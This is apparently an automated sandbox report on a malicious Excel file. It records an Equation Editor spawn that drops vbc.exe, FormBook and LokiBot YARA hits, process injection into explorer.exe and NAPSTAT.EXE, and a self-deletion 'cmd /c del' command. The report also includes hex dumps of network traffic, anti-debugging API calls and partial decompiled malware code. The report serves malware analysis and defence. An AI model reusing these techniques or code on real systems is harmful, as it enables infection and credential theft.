                  Data Raw: c0 4c c3 db cd c5 93 5d 55 14 39 b6 3e 24 13 09 bd 46 7f a3 38 d8 f5 8c 62 41 6f 79 33 d1 c3 6e 24 67 7f be 71 ac 91 32 8e a6 51 82 fb 00 c1 d3 18 14 ac 84 80 9b 97 89 ea 59 7b ab 1c fa b4 72 2c 81 92 87 0a 86 9b f1 e4 60 41 0f ba e3 88 b0 31 87 78 80 d1 c2 4b 58 e6 7e 0a 2f c2 89 af 4c 45 22 b7 b4 a3 90 3b 8f c8 35 eb 5b 59 ae 80 25 67 8a 69 1a 7d e9 5c 2c 34 91 9f d4 99 bf 3a 3d 90 ea 69 a3 02 a5 ec d4 54 93 61 e7 99 3e 6a 28 09 e2 bf b1 11 7c 2a e8 0f d2 66 3d f5 e1 cb a7 e1 1c 31 56 c2 72 72 9e e3 c4 a1 6a c0 e3 30 fa e7 f2 ca 24 ff a7 55 a4 4f 33 01 64 7f 01 ec 28 a6 29 5f 7c 26 dd 8a 41 7c 37 9e 8a 1b c5 98 14 0e 18 7e d5 02 a4 e3 0d 9e e4 ae 42 19 16 6b ed 05 06 39 95 07 40 ec a0 c0 13 c8 1b 2e 54 80 5c 88 94 a6 ff 92 8e 21 0c 19 87 b0 a3 64 29 6d e0 4a 11 d0 c3 d0 d8 36 07 d7 4b f1 a6 7e da a4 16 72 74 b9 e2 f1 30 0b ff 67 72 41 3f 0c e0 b9 d3 c0 6c d6 a5 6a ee e1 99 b7 af 45 55 6a 38 6b f8 4c 53 45 df 8c c5 b4 51 38 56 e8 29 78 f6 27 05 4d 08 a2 d1 1e 24 4a 3f 54 e7 1f a5 bd ff 23 4d de 9b d4 48 98 e3 38 e7 8d 8f 2b c0 a3 dd 39 d7 2f 5d cd d5 93 5f 5b 31 5e b9 3d 02 84 a3 d2 47 05 b9 ba 54 b3 e3 64 dc c9 5c 66 2a 93 d0 b1 70 da 29 d0 65 5f 1c ed ec 81 c6 17 43 00 91 d7 08 98 cd 2d 50 a1 05 53 dd 30 3a e2 4b c0 d0 e7 64 e2 59 4d c8 fa 0e 96 86 f2 9c b3 28 59 1c 76 de c9 bb 54 7e a7 2a 14 87 05 2f eb cc 33 75 64 1a fd e8 e7 a3 4a 0f 8e c6 60 ce e5 b2 95 8c ba 53 39 bf 74 c2 0f 71 90 27 b5 75 bb 1b 12 91 78 d9 85 00 58 ef d6 f4 d5 f9 87 dc 4f 01 42 41 93 45 e9 a7 c9 b3 bf 6c 26 6f b7 51 8b 1b 40 3b 27 08 67 28 15 76 1b 99 02 a2 49 c3 42 4e 83 36 7a c7 f8 ae 35 e9 ce 98 5e 54 33 fc 71 2e cc 8c 40 9b de a5 8a 77 7c 75 60 43 10 81 de bd 93 56 68 9c d7 70 c0 c9 92 7e a3 09 77 de 8a eb c6 d0 15 ae 89 64 71 ef c2 4f d9 a4 61 fd 86 9e 30 d2 59 90 47 3c 65 50 33 b3 1f 16 a5 9b 6d 75 1b 18 fe dd 91 da 35 a5 cc 78 ad a4 63 87 84 26 5c 61 22 38 f1 4b 07 da c2 b9 c0 64 aa 66 53 7f 19 78 45 d4 9a 97 a9 3e a4 5b ac bf d5 ce 32 85 4a 24 a1 55 e7 62 8e ef b2 ca 8c f9 b4 14 10 f5 77 0d 09 a5 d8 b2 61 3d 6d 0d b6 df d7 38 b8 da 38 ba 76 17 20 fc 00 01 89 6e 54 0f 4c 65 12 0b 8b c6 a9 e7 ec cd b8 27 90 a9 57 ee 85 e6 9d e1 36 fb d4 02 87 9f c9 28 c3 dc 13 2c d0 57 64 9f ac e5 ad b6 d2 9d bd 36 57 91 62 3f 90 fe 91 01 ce ab f9 88 77 d0 64 99 be 90 82 ca d7 69 05 c6 05 ea 51 3d 4a b1 07 f4 87 4c 9a c1 e8 f0 5c b0 11 2b 76 fd 38 c2 b4 87 42 ca e5 2e 53 47 cc cf be fc 1d 0b 1d b0 d2 52 d3 75 41 2b a8 9b 9c 6c bd 7d 98 fa 69 cc 11 82 0e 67 1d f7 d2 27 fb 8e 81 2d 41 88 d3 d2 8b db 2c 20 38 7e 2c e8 8a f4 93 cb fc 12 bd fe b6 ea f4 be c0 fd 71 c7 44 ff 59 e8 63 5e 4b f9 e2 4e 5b aa 62 e5 03 f2 71 ff 2e e5 92 49 4d fa 26 bd 06 83 65 3e 1c 68 0c b8 39 b2 5a a2 58 3a 58 f6 a2 83 e7 f0 54 a7 49 eb 7b 34 85 16 fe 7f c1 2d cd d7 be 1a cd d7 ad 02 cb 61 db d7 d5 e2 86 9b f1 e4 38 c2 e7 b3 68 40 33 f1 bb f3 80 d2 03 c8 98 ce 7d 02 d0 23 19 af 4c 45 22 b7 b4 a3 90 3b 8f c8 35 eb 5b 59 ae 80 25 67 8a 69 1a 7d e9 5c 2c 34 91 9f d4 59 bf 3a 3d 9e f5 d3 ad 02 11 e5 19 75 2b 60 ab 54 1f 3e 40 60 91 9f c1 63 13 4d 9a 6e bf 46 5e 94 8f a5 c8 95 3c 53 33 e2 00 07 f0 c3 ad cf 4a 84 ac 63 da 8a 9d ae 41 d1 aa 58 ae 6b 33 01 64 7f 01 ec 28 0d d5 57 96 c9 40 ec f8 93 aa f8
                  Data Ascii: L]U9>$F8bAoy3n$gq2QY{r,`A1xKX~/LE";5[Y%gi}\,4:=iTa>j(|*f=1Vrrj0$UO3d()_|&A|7~Bk9@.T\!d)mJ6K~rt0grA?ljEUj8kLSEQ8V)x'M$J?T#MH8+9/]_[1^=GTd\f*p)e_C-PS0:KdYM(YvT~*/3udJ`S9tq'uxXOBAEl&oQ@;'g(vIBN6z5^T3q.@w|u`CVhp~wdqOa0YG<eP3mu5xc&\a"8KdfSxE>[2J$Ubwa=m88v nTLe'W6(,Wd6Wb?wdiQ=JL\+v8B.SGRuA+l}ig'-A, 8~,qDYc^KN[bq.IM&e>h9ZX:XTI{4-a8h@3}#LE";5[Y%gi}\,4Y:=u+`T>@`cMnF^<S3JcAXk3d(W@
                  Nov 19, 2020 07:44:36.356851101 CET69INData Raw: d7 38 b8 da 38 ba 76 17 20 fc 00 01 89 6e 54 0f 4c 65 12 0b 8b c6 a9 e7 ec cd b8 27 90 a9 57 ee 85 e6 9d e1 36 fb d4 02 87 9f c9 28 c3 dc 13 2c d0 57 64 9f ac e5 ad b6 d2 9d bd 36 57 91 62 3f 90 fe 91 01 ce ab f9 88 77 d0 64 99 be 90 82 ca d7 69
                  Data Ascii: 88v nTLe'W6(,Wd6Wb?wdiQ=JL\+v8B.SGRuA+l}ig'-A, 8~,qDYc^KN[bq.IM&e>h9ZX:XTI{4-
                  Nov 19, 2020 07:44:36.356889963 CET70INData Raw: 33 f4 58 fe ad fa 18 b3 6c ab 39 85 b4 6a e4 56 fb f5 8b 0d 54 f1 06 c2 2c e9 dd 8a 19 92 7a ab 73 c1 c9 e6 e5 88 94 a6 ff 92 8e 21 0c 19 87 b0 a3 64 29 6d e0 1a 54 d0 c3 9c d9 37 07 77 f5 ef e7 7e da a4 16 72 74 b9 e2 11 30 09 fe 6c 73 4b 3f 0c
                  Data Ascii: 3Xl9jVT,zs!d)mT7w~rt0lsK?$ljDDUj(kLGQ8F)x'H$J?Q#M{H8+yV/]O[1^-GTd\f*p)e_C-PS0:KdYM(YvT~*/3u
                  Nov 19, 2020 07:44:36.356926918 CET71INData Raw: c7 44 44 55 6a 28 6b f8 4c b3 47 df 8c c5 f4 51 38 46 e8 29 78 f4 27 05 48 08 a3 d1 1e 24 4a 3f 51 e7 1e a5 bd ff 23 4d de 7b d6 48 98 e1 38 e7 8d 8f 2b c0 a1 dd 79 56 2f 5d dd d5 93 4f 5b 31 5e b9 2d 02 84 b3 d2 47 05 b9 ba 54 a3 e3 64 dc c9 5c
                  Data Ascii: DDUj(kLGQ8F)x'H$J?Q#M{H8+yV/]O[1^-GTd\f*p)e_C-PS0:KdYM(YvT~*/3udJ`S9tq'uxXOBAEl&o%c4;'vI@N&z5^T3q
                  Nov 19, 2020 07:44:36.681452990 CET73INData Raw: 44 91 03 a8 7b 94 71 f8 33 fe b0 c0 49 64 0c 8a 0b 0f 3e 92 ae c4 4c 7a ec 9e cc 0d 33 11 42 50 b3 51 d4 e5 83 14 39 44 f5 d5 00 e1 89 ea f7 84 ec 50 e7 f9 e8 f8 c3 95 a6 b0 fc fc 59 c6 d7 a1 75 e4 2c a7 bd 82 79 d6 27 ac 43 ef 16 9f c8 f4 be 43
                  Data Ascii: D{q3Id>Lz3BPQ9DPYu,y'CC9azrusKmJ#}6>YEq4^swsF&5F(]1F?7]+ H&S}*3AjSaq,\,4[_n u.%asf
                  Nov 19, 2020 07:44:36.681513071 CET74INData Raw: 16 2a 69 4d 3d e8 bc b5 0b 4d 27 5f 48 fd ab 5e fa 5a da 37 34 25 ce 14 2b 18 9b d4 4b 5f ec 3d 8b 4e 7d 0d 63 28 a8 d9 07 b1 5b 15 40 ab 81 9a c8 f6 58 c2 aa 0b 37 cc 8a 42 f1 16 25 20 26 ae f4 71 39 09 e9 c2 fc 52 09 52 a8 c6 40 b9 70 bd 0e 57
                  Data Ascii: *iM=M'_H^Z74%+K_=N}c([@X7B% &q9RR@pWYD3B)lw$JxfOcO5@|Wld+H!Zd-&}!Bh5mU[%zMn,Q_JXHe[kbM R[]dgv
                  Nov 19, 2020 07:44:36.681543112 CET76INData Raw: 87 2b 91 6d e7 01 fe 0d 8e 71 54 9f 66 8e c8 12 db 42 f9 6a cb 90 5b af 89 54 c4 4d a5 ba 50 32 48 31 27 73 1a 0f ab 72 f3 51 14 f3 00 e2 03 80 3e a5 b5 af 4e dd 48 2f 50 fd 34 0e fe f2 9f 25 03 67 0c 1b c7 b0 c9 9d 34 87 b6 f1 45 0c 7f f6 1f d4
                  Data Ascii: +mqTfBj[TMP2H1'srQ>NH/P4%g4E.^up1np_(+u8~$o`+zWYpS.L)Qd@gAbM?KLf({Sg7iTQi*CO+}Td(M=TT~u5w].Xm!`jYJi
                  Nov 19, 2020 07:44:36.681581974 CET77INData Raw: a7 1f 24 f3 26 3e 02 20 b8 fe bd e0 71 2c a7 60 4c b3 47 93 d9 a2 6d ff 8b a4 b1 3f df f7 4c 3e a9 73 1d 4e 87 aa b1 f8 bf 51 e1 12 ab 00 7d a2 cd 16 31 12 a0 f2 f7 3b f4 3e 14 73 bf 66 8d 8b be b0 f9 61 98 bc ef 21 8b 4e 31 91 ed 84 2f 8f 3f fb
                  Data Ascii: $&> q,`LGm?L>sNQ}1;>sfa!N1/?sr9X-:&~Yo0st>]dsiZ3)@{j9G8U[UbhVeqxPzbJ5sL9@2IZ'<3/GrvA_,[s9VUzqt\<QZ`6
                  Nov 19, 2020 07:44:36.681611061 CET78INData Raw: 4d 4b 5c a7 87 c1 bc f2 6e 4f a3 51 7f 83 ad 08 95 dd f8 f1 a6 d3 cb 21 4f 44 b9 78 bf 21 64 0a 2c b8 da b6 d6 de f0 0b 9a 54 ab 55 a6 44 91 56 1a e5 99 ec b2 6d b4 53 07 99 11 a7 5f 37 6a 32 03 fe 9d c7 82 dc 39 52 30 65 72 3d 74 1d 0f ad 54 be
                  Data Ascii: MK\nOQ!ODx!d,TUDVmS_7j29R0er=tT.'Pe:QLxl8{LashoGh"uDw,SI@xO5L+'*<cY2j%[KG%h?>:)+^B$rvtv:z;S)N[,g
                  Nov 19, 2020 07:44:36.681658983 CET80INData Raw: 25 77 a5 be e7 43 a8 d9 5b 61 02 47 58 38 53 bf 6f 47 c3 65 5b cd 3a 65 12 2e ea 65 fe e5 d9 31 d5 10 3d 35 5a cc 87 6c 62 6b 06 62 d9 5c 9e 22 33 0f c2 7d d2 49 c8 cc e9 e8 62 d8 81 d8 b7 4d 55 7d 97 56 3e 5b 9a 6a b7 54 28 cd 85 b5 24 aa ab 6e
                  Data Ascii: %wC[aGX8SoGe[:e.e1=5Zlbkb\"3}IbMU}V>[jT($ndut's5I(8$fQH\etom+G'o\jG_FP$,/-R-zeAQCVZLHS5*vC>?h1eib\iG
                  Nov 19, 2020 07:44:36.681701899 CET81INData Raw: cb f2 d5 57 96 42 1c 74 fc 12 4c 07 33 f4 58 cd f9 4a 1c 38 9b 98 68 95 75 94 ec d7 1d 0a 8b 0d 54 7a 72 72 28 28 13 9a d8 59 72 98 80 4a 94 16 64 6b 6b a6 ff 92 05 7d 94 1d 46 73 ab 57 da e6 bd e6 95 2b db 1d 3a c8 07 77 f5 dc 93 e6 de 2f 4b 82
                  Data Ascii: WBtL3XJ8huTzrr((YrJdkk}FsW+:w/KGM?c$KnXL(kMbH( Y.58/+)RSF-82bt].f*[u^Mjv(,8=(&7$<E5D


                  Code Manipulations

                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  Analysis Process: EXCEL.EXE PID: 1552 Parent PID: 584

                  General

                  Start time:07:42:52
                  Start date:19/11/2020
                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  Wow64 process (32bit):false
                  Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                  Imagebase:0x13ff00000
                  File size:27641504 bytes
                  MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Chronological Activities

                  Analysis Process: EQNEDT32.EXE PID: 2408 Parent PID: 584

                  General

                  Start time:07:43:12
                  Start date:19/11/2020
                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Wow64 process (32bit):true
                  Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                  Imagebase:0x400000
                  File size:543304 bytes
                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Chronological Activities

                  Analysis Process: vbc.exe PID: 2692 Parent PID: 2408

                  General

                  Start time:07:43:15
                  Start date:19/11/2020
                  Path:C:\Users\Public\vbc.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Users\Public\vbc.exe'
                  Imagebase:0x400000
                  File size:61440 bytes
                  MD5 hash:C05EEE88F0B57E853996957D6523397B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Visual Basic
                  Reputation:low

                  Chronological Activities

                  Analysis Process: vbc.exe PID: 2868 Parent PID: 2692

                  General

                  Start time:07:44:20
                  Start date:19/11/2020
                  Path:C:\Users\Public\vbc.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Users\Public\vbc.exe'
                  Imagebase:0x400000
                  File size:61440 bytes
                  MD5 hash:C05EEE88F0B57E853996957D6523397B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low

                  Chronological Activities

                  Analysis Process: explorer.exe PID: 1388 Parent PID: 2868

                  General

                  Start time:07:44:35
                  Start date:19/11/2020
                  Path:C:\Windows\explorer.exe
                  Wow64 process (32bit):false
                  Commandline:
                  Imagebase:0xffca0000
                  File size:3229696 bytes
                  MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate

                  Chronological Activities

                  Analysis Process: autoconv.exe PID: 1664 Parent PID: 1388

                  General

                  Start time:07:44:45
                  Start date:19/11/2020
                  Path:C:\Windows\SysWOW64\autoconv.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\SysWOW64\autoconv.exe
                  Imagebase:0xa90000
                  File size:679424 bytes
                  MD5 hash:09D786401F6CA6AEB16B2811B169F944
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate

                  Chronological Activities

                  Analysis Process: NAPSTAT.EXE PID: 1840 Parent PID: 1388

                  General

                  Start time:07:44:45
                  Start date:19/11/2020
                  Path:C:\Windows\SysWOW64\NAPSTAT.EXE
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\NAPSTAT.EXE
                  Imagebase:0x960000
                  File size:279552 bytes
                  MD5 hash:4AF92E1821D96E4178732FC04D8FD69C
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000009.00000002.2382070172.0000000000553000.00000004.00000020.sdmp, Author: Florian Roth
                  Reputation:moderate

                  Chronological Activities

                  Analysis Process: cmd.exe PID: 2168 Parent PID: 1840

                  General

                  Start time:07:44:49
                  Start date:19/11/2020
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:/c del 'C:\Users\Public\vbc.exe'
                  Imagebase:0x4a920000
                  File size:302592 bytes
                  MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Chronological Activities

                  Disassembly

                  Code Analysis

                  Reset < >

                    Analysis Process: vbc.exe PID: 2692 Parent PID: 2408 vbc.exeCOMMON

                    Executed Functions

                    Function 003106B1, Relevance: 14.6, APIs: 4, Strings: 4, Instructions: 579COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: LibraryLoad
                    • String ID: W.E$.FBu$1.!T$ntdll
                    • API String ID: 1029625771-399834001
                    • Opcode ID: df1d7e25fe2405ffd91c6f2229c7137afdf75735c254c4b97c50faf073f8e9f5
                    • Instruction ID: 7e8d8d0f005582569f5ae37e2641913730cfcceeb44d87fe5af0612d0895214c
                    • Opcode Fuzzy Hash: df1d7e25fe2405ffd91c6f2229c7137afdf75735c254c4b97c50faf073f8e9f5
                    • Instruction Fuzzy Hash: E802D234740305EAEF3F6E648CA57EE2256DF4E750FA5412AFC869B5C5C7B5C8C68202
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 003154F4, Relevance: 7.7, APIs: 3, Strings: 1, Instructions: 738nativethreadCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0031481A: LoadLibraryA.KERNEL32(?,082962C8,?,003104E9,00000000,00000000,00000040,00000000,?), ref: 003148E9
                    • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00310570,00000000,00000000,00000000,00000000), ref: 003105F8
                      • Part of subcall function 00315A6C: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,00315609,00000040,00310570,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00315A87
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: InformationLibraryLoadMemoryProtectThreadVirtual
                    • String ID: 1.!T
                    • API String ID: 449006233-3147410236
                    • Opcode ID: 0dfa85546250b16a6c5da4e598c3570d59c47ef42f48d5360ab09f9800666a5b
                    • Instruction ID: c6aa10b5175b6378013766fcc7a0ba37ddb9425383b4dfb60d3d9ebc1ff1174c
                    • Opcode Fuzzy Hash: 0dfa85546250b16a6c5da4e598c3570d59c47ef42f48d5360ab09f9800666a5b
                    • Instruction Fuzzy Hash: 6C329A70740301EEEB2A9F24CDD5BEA77A2EF5A360F558229ED958B2C1D37588C1C712
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00311721, Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 428libraryCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(?,082962C8,?,003104E9,00000000,00000000,00000040,00000000,?), ref: 003148E9
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: LibraryLoad
                    • String ID: 7HoB$DV
                    • API String ID: 1029625771-80660350
                    • Opcode ID: ca13a13595e608c10fbbadc0993d19df2e946924c5c70a6849d37526f0df436c
                    • Instruction ID: a749e6cb28559a4fdbc28d0dae975dbdc6f2cf951f3111f8afa93b22c4ec30f1
                    • Opcode Fuzzy Hash: ca13a13595e608c10fbbadc0993d19df2e946924c5c70a6849d37526f0df436c
                    • Instruction Fuzzy Hash: 92E16670740702EFEB199F28CC90BE6B3A5BF09350F558229ED9997681D734E8D58BC1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00315336, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 177nativethreadCOMMON
                    Download Yara Rule
                    APIs
                    • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00310570,00000000,00000000,00000000,00000000), ref: 003105F8
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: InformationThread
                    • String ID: 1.!T
                    • API String ID: 4046476035-3147410236
                    • Opcode ID: ed3628479d0de84b9dd0271451d3fd2b69bb2c35695d0e1f0b0588ecae73788e
                    • Instruction ID: d3f95e689ba8c496628c307f2edcf8216086fd22df5a58f6ec7b16fb1a0f409c
                    • Opcode Fuzzy Hash: ed3628479d0de84b9dd0271451d3fd2b69bb2c35695d0e1f0b0588ecae73788e
                    • Instruction Fuzzy Hash: 1E517C74744305A9FF2E3E348D61BEB225A9F4D7A0FA04115FD969B1C1D7A5CCC08642
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0031044B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125nativethreadCOMMON
                    Download Yara Rule
                    APIs
                    • EnumWindows.USER32(003104A1,?,00000000,00000000,00000040,00000000,?), ref: 00310481
                    • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00310570,00000000,00000000,00000000,00000000), ref: 003105F8
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: EnumInformationThreadWindows
                    • String ID: 1.!T
                    • API String ID: 1954852945-3147410236
                    • Opcode ID: 90e507608f2d66145d6797fe60ab3e5fb8efb1446268302234f37188e06cb9a0
                    • Instruction ID: 209d814025adae8da057aa9cf0ba9c22ff31e79f58bd8afc49d361747501d016
                    • Opcode Fuzzy Hash: 90e507608f2d66145d6797fe60ab3e5fb8efb1446268302234f37188e06cb9a0
                    • Instruction Fuzzy Hash: 8B317B34344305AAFB1E7E388DA17EB2695DF4E794F604129FD869B1C1DBA5C8C1C650
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0031078C, Relevance: 5.1, APIs: 3, Instructions: 591serviceCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0031481A: LoadLibraryA.KERNEL32(?,082962C8,?,003104E9,00000000,00000000,00000040,00000000,?), ref: 003148E9
                    • CloseServiceHandle.ADVAPI32(?,00000000,00000004), ref: 00310B52
                    • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 003129B5
                    Memory Dump Source
                    • Source File: 00000004.00000002.2302114614.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                    Similarity
                    • API ID: CloseHandleLibraryLoadProcessServiceTerminate
                    • String ID:
                    • API String ID: 3893904122-0
                    • Opcode ID: c672aa40a8413f3ff397fe6fca062ec27c13daa26c55625c4d799e9e08b19e20
                    • Instruction ID: 293c14f89fb717ec4770b07d975955c8e7e41001c9575d719a0ba464a53a1f13
                    • Opcode Fuzzy Hash: c672aa40a8413f3ff397fe6fca062ec27c13daa26c55625c4d799e9e08b19e20
                    • Instruction Fuzzy Hash: 2E027B70740305EEEF3E6E24CC95BEE2266EF9D350FA54129FD859B1C5C7B988C68601
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401218, Relevance: 4.3, APIs: 1, Strings: 1, Instructions: 762COMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 69%
                    			_entry_(signed int __eax, void* __ebx, intOrPtr* __ecx, signed int __edx, signed int __edi, void* __esi) {
				signed char _t253;
				signed char _t254;
				signed char _t256;
				signed int _t257;
				void* _t258;
				signed int _t261;
				signed char _t262;
				signed int _t265;
				signed int _t266;
				signed char _t268;
				signed int _t269;
				intOrPtr* _t270;
				signed char _t271;
				signed char _t272;
				void* _t274;
				signed char _t277;
				signed char _t278;
				signed char _t279;
				signed char _t280;
				signed char _t282;
				intOrPtr* _t283;
				intOrPtr* _t284;
				intOrPtr* _t285;
				intOrPtr* _t287;
				intOrPtr* _t289;
				void* _t290;
				intOrPtr* _t291;
				void* _t292;
				intOrPtr* _t293;
				void* _t295;
				intOrPtr* _t296;
				void* _t297;
				intOrPtr* _t298;
				signed char _t300;
				signed int _t301;
				signed char _t302;
				intOrPtr* _t303;
				void* _t304;
				signed int _t305;
				intOrPtr* _t307;
				intOrPtr* _t308;
				void* _t309;
				intOrPtr* _t310;
				intOrPtr* _t311;
				intOrPtr* _t312;
				intOrPtr* _t313;
				signed int _t314;
				void* _t315;
				intOrPtr* _t316;
				signed char _t317;
				intOrPtr* _t319;
				intOrPtr* _t322;
				intOrPtr* _t323;
				intOrPtr* _t324;
				signed char _t325;
				signed int _t329;
				void* _t331;
				signed int _t334;
				void* _t336;
				signed char _t339;
				void* _t340;
				signed int _t341;
				signed int _t342;
				signed char _t344;
				intOrPtr* _t347;
				void* _t348;
				signed int _t351;
				signed int _t352;
				signed int _t355;
				intOrPtr* _t356;
				intOrPtr* _t357;
				intOrPtr* _t358;
				void* _t359;
				void* _t360;
				void* _t361;
				signed char _t362;
				signed int _t367;
				intOrPtr* _t369;
				signed int _t370;
				signed int _t372;
				signed int _t373;
				void* _t379;
				signed int _t380;
				signed char _t383;
				void* _t384;
				intOrPtr* _t385;
				signed int _t387;
				signed int _t390;
				signed int _t394;
				intOrPtr* _t395;
				void* _t396;
				void* _t401;
				signed int _t402;
				signed int _t406;
				void* _t407;
				void* _t408;
				signed int _t409;
				signed int _t411;
				signed int _t414;
				signed int _t415;
				signed int _t417;
				void* _t419;
				void* _t420;
				void* _t422;
				signed int _t423;
				intOrPtr _t438;
				signed int _t440;
				intOrPtr _t448;
				intOrPtr _t449;
				intOrPtr _t450;
				intOrPtr _t451;
				signed int _t454;
				intOrPtr _t462;
				intOrPtr _t464;
				intOrPtr _t467;
				intOrPtr _t470;
				signed int _t476;
				intOrPtr* _t479;
				signed char _t483;
				intOrPtr _t484;
				signed char _t489;
				intOrPtr _t490;
				signed char _t493;
				intOrPtr _t498;

				_t380 = __edx;
				_t369 = __ecx;
				_push("VB5!6&*"); // executed
				L00401210(); // executed
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax ^ __eax;
				 *__eax =  *__eax + __eax;
				_t253 = __eax + 1;
				 *_t253 =  *_t253 + _t253;
				 *_t253 =  *_t253 + _t253;
				 *_t253 =  *_t253 + _t253;
				 *__edi =  *__edi + _t253;
				_t254 = _t253 | 0x000000c7;
				asm("stosd");
				asm("pushfd");
				_t354 = __ebx + _t254;
				_t394 = __esi + 1;
				_t255 = __edi;
				_t383 = _t254;
				asm("sbb eax, 0xa17d13c7");
				asm("popad");
				asm("in eax, 0x0");
				 *__edi =  *__edi + __edi;
				 *__edi =  *__edi + __edi;
				 *__ecx =  *__ecx + __edi;
				 *__edi =  *__edi + __edi;
				 *__edi =  *__edi + __edi;
				 *((intOrPtr*)(__edi + __edi)) =  *((intOrPtr*)(__edi + __edi)) + __edi;
				 *__edi =  *__edi + __edi;
				asm("popad");
				asm("o16 jz 0x75");
				if( *__edi >= 0) {
					L4:
					_t383 = _t383 - 1;
					 *_t255 =  *_t255 + _t255;
				} else {
					 *__edi =  *__edi + __edi;
